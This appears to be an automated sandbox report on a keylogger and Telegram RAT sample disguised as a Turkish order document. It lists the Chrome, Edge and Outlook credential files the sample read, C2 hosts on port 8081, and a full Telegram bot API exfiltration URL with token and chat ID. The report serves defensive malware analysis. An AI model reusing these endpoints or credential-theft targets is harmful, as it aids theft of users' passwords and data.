Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	112 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	112 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	68%	ReversingLabs	Win32.Trojan.Leonem

Source	Detection	Scanner	Label	Link
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.96.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:38:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://git.io/vblQ0	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	false		high
http://tempuri.org/DataSet2.xsd	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1451701321.0000000002772000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.96.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586928
Start date and time:	2025-01-09 19:09:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe renamed because original name is a hash value
Original Sample Name:	LC HOLDNG a.s fiyati_teklif 017867Siparii jpeg doc .exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/6@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 291 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.56.254.164, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Simulations

Behavior and APIs

Time	Type	Description
13:09:55	API Interceptor	7216279x Sleep call for process: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe modified
13:09:57	API Interceptor	9x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse
	gem1.exe	Get hash	malicious	Unknown	Browse
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	PO.exe	Get hash	malicious	MassLogger RAT	Browse
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.96.1	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
132.226.247.73	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.64.1
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
